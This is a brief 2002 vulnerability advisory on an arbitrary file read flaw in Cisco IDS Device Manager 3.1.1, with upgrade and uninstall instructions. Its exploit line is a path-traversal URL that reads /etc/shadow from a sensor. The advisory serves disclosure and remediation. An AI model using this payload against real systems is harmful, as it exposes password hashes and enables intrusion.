Cisco IDS Device Manager arbitrary file read access vulnerability
4th Jun 2002 [SBWID-5399]
COMMAND

	Cisco IDS Device Manager arbitrary file read access vulnerability

SYSTEMS AFFECTED

	Version 3.1.1

PROBLEM

	Andrew Lopacki [Andrew.Lopacki@amsouth.com] found a bug in Cisco IDS
	Device Manager that allows arbitrary file read access.

	Exploit
	=======

	https://<sensor>/../../../../../etc/shadow 

SOLUTION

	Upgrade to version 3.1.2, downloadable from

	http://www.cisco.com/cgi-bin/tablebuild.pl/ids-appsens

	The name of the file is IDSk9-sp.3.1-2-S23.bin.

	Users that installed IDSk9-sp.3.1-1-S22.bin will need to uninstall this
	service pack by typing the command

	#IDSk9-sp.3.1-1-S22.bin -U

	before applying the new service pack.
